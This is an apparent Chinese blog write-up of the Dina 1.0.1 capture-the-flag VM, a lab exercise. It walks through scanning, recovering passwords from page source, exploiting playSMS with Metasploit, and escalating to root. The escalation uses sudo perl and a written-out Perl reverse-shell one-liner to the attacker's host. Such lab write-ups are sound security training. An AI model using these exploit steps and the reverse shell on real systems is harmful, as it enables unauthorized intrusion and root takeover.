首页 > 其他分享 >Dina: 1.0.1

Dina: 1.0.1

时间:2024-09-29 16:21:18浏览次数:9  
标签:set 1.0 Dina 192.168 119.150 密码 password root

1.主机发现

arp-scan -l

2.端口扫描

nmap -p- -A -sV -Pn 192.168.119.150

这里看到只开放了80端口

3.目录扫描

dirsearch -u 192.168.119.150

4.Web访问

浏览器访问192.168.119.150,页面有个提交查询按钮,点击会跳转但没有什么有用的信息

拼接访问/robots.txt,发现一些接口

http://192.168.119.150/robots.txt

拼接访问/secure,发现这里有一个压缩包,直接下载下来看看

http://192.168.119.150/secure

解压需要密码,接下来寻找密码

接着通过测试发现,拼接访问/nothing时不是404页面,F12查看源代码发现疑似密码信息

http://192.168.119.150/nothing

#my secret pass
freedom
password
helloworld!
diana
iloveroot

接着去尝试解压,输入freedom解压成功,得到一个损坏的MP3文件

将其用记事本打开,发现一段话、一个用户名、一个加密密码和一个url

I am not toooo smart in computer .......dat the resoan i always choose 
easy password...with creds backup file....
 
uname: touhid
password: ******
 
 
url : /SecreTSMSgatwayLogin

这段话提示了这个用户的密码是一个简单密码,我们暂时猜测可能与刚才源代码中得到的密码有关

拼接访问url,得到一个登录界面

http://192.168.119.150/SecreTSMSgatwayLogin

尝试一番下来发现全都登不上,然后换了个浏览器等上去了,用户名就是刚刚得到的用户名,密码确实来自刚才那段源码

username:touhid
password:diana

登录之后直接看到CMSplaySMS,接下来利用MSF查看有无可利用漏洞

5.漏洞挖掘

kali中开启msf

msfconsole

查看CMS历史漏洞

search playSMS

经过尝试后,发现第二个可以利用,接下来尝试利用该漏洞来getshell

6.漏洞利用

use 2					#使用第二个漏洞
show options	#查看需要设置的选项

Required显示为yes的参数是必须设置的

set password diana                  #配置密码
set rhosts 192.168.119.150            #靶机ip
set targeturi /SecreTSMSgatwayLogin #配置上传文件页面的url  
set username touhid                 #配置账户       
set lhost 192.168.119.128             #监听者kali的ip       
set lport 6666                      #监听者kali的端口

设置完毕后再次查看一下选项,确认设置无误

show options

确认无误,直接run,成功getshell

python升级为交互式shell

shell
python -c 'import pty; pty.spawn("/bin/bash")'

7.权限提升

查看当前用户能执行的sudo命令

sudo -l

这里显示www-data用户可以不输入密码使用sudo命令执行/usr/bin/perl命令

接下来可以利用/usr/bin/perl命令,来获取root权限

首先kali开启监听

nc -lvvp 9999

然后通过perl命令写入反弹shell

sudo perl -e 'use Socket;$i="192.168.119.128";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

kali成功接收到反弹shell,提权成功

到这里还没结束,最终是要拿到/root/flag.txt文件

cat /root/flag.txt

________                                                _________
\________\--------___       ___         ____----------/_________/
    \_______\----\\\\\\   //_ _ \\    //-------/________/
        \______\----\\|| (( ~|~ )))  ||//------/________/
            \_____\---\\ ((\ = / ))) //----/_____/
                 \____\--\_)))  \ _)))---/____/
                       \__/  (((     (((_/
                          |  -)))  -  ))
 
 
root password is : hello@3210
easy one .....but hard to guess.....
but i think u dont need root password......
u already have root shelll....
 
 
CONGO.........
FLAG : 22d06624cd604a0626eb5a2992a6f2e6                                                     

标签:set,1.0,Dina,192.168,119.150,密码,password,root
From: https://blog.csdn.net/2301_78815619/article/details/142637503

相关文章

  • 项目实战:Qt+OSG爆破动力学仿真三维引擎测试工具v1.1.0(加载.K模型,子弹轨迹模拟动画,支持
    若该文为原创文章,转载请注明出处本文章博客地址:https://hpzwl.blog.csdn.net/article/details/142454993长沙红胖子Qt(长沙创微智科)博文大全:开发技术集合(包含Qt实用技术、树莓派、三维、OpenCV、OpenGL、ffmpeg、OSG、单片机、软硬结合等等)持续更新中…Qt开发专栏:项目实战......
  • 《DNK210使用指南 -CanMV版 V1.0》第二十七章 摄像头图像调整实验
    第二十七章摄像头图像调整实验1)实验平台:正点原子DNK210开发板2)章节摘自【正点原子】DNK210使用指南-CanMV版V1.03)购买链接:https://detail.tmall.com/item.htm?&id=7828013987504)全套实验源码+手册+视频下载地址:http://www.openedv.com/docs/boards/k210/ATK-DNK210.html5......
  • 地平线静态目标检测 MapTR 参考算法-V1.0
    1.简介高清地图是自动驾驶系统的重要组件,提供精确的驾驶环境信息和道路语义信息。传统离线地图构建方法成本高,维护复杂,使得依赖车载传感器的实时感知建图成为新趋势。早期实时建图方法存在局限性,如处理复杂地图元素的能力不足、缺乏实例级信息等,在实时性和后处理复杂度上存在挑战......
  • 教育机构管理系统V1.1.0
    教育机构管理系统,教育机构数字化全场景运营管理系统,全方位解决教育机构经营管理难题,提供全部无加密源码,支持私有化部署。V1.1.0新增功能增加站点配置,可配置站点名称、备案号、上传Logo、编辑首页SEO元素、网站开放状态、网站灰度模式等信息分类管理、信息管理增加SEO元素编辑首页......
  • 雨情教务排课系统V1.0.2
    PC端雨情教务排课系统,支持班级设置、课程设置、教师设置、排课模板、课表打印、课程冲突提醒等功能。提供全部无加密源代码,支持私有化部署。V1.0.2优化视图中变量htmlentities输出优......
  • 智尚房产中介小程序V1.0.0
    原生微信小程序,为房地产中介提供房源管理、发布、报备客户、跟踪客户以及营销推广获客等服务的系统。V1.0.0发布版本......
  • SimpleRAG-v1.0.3:增加文件对话功能
    Kimi上有一个功能,就是增加文件之后对话,比如我有如下一个私有文档:会议主题:《如何使用C#提升工作效率》参会人员:张三、李四、王五时间:2024.9.2614:00-16:00会议内容:1.自动化日常任务许多日常任务可以自动化,从而节省时间和精力。例如,如果你需要定期处理大量数据,可以使用C#编......
  • 智慧小区物业管理小程序V1.0.6
    智慧小区物业管理小程序,包含小区物业缴费、房产管理、在线报修、业主活动报名、在线商城等功能。为物业量身打造的智慧小区运营管理系统,贴合物业工作场景,轻松提高物业费用收缴率,更有功能模块个性化组合,助力物业节约成本高效运营。V1.0.6房屋高层多层别墅可分别设置收费1.新增房屋......
  • 项目实战:Qt+OSG爆破动力学仿真三维引擎测试工具v1.1.0(加载.K模型,子弹轨迹模拟动画,支持
    需求  1.使用osg三维引擎进行动力学模型仿真性能测试;  2.打开动力学仿真模型文件,.k后缀的模型文件,测试加载解析过程;  3.解决第三方company的opengl制作的三维引擎,绘制面较多与弹丸路径模拟较卡顿的问题;  4.测试时,使用的模型为公开模型,基础面数量达到160多万个;  5.测......
  • Android 11.0 蓝牙音乐获取歌手、歌曲等信息功能实现
    1.前言在11.0的系统rom定制化开发中,在一些功能性开发中,可能会遇到一些蓝牙音乐的项目,所以会要求在手机端获取蓝牙音乐的歌手歌曲的信息功能,这就需要了解Bluetooth的音乐播放功能,然后实现这些获取歌手信息和歌曲详情的功能2.蓝牙音乐获取歌手、歌曲等信息功能实现的核心类pa......